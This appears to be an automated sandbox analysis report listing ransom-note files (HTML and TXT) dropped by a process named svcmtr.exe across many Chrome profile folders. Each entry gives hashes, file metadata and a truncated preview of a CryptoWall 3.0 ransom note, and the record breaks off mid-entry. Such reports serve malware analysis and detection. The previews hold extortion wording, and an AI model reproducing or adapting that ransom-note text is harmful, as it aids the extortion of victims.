                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:true
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:true
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Thumbnails\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Thumbnails\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
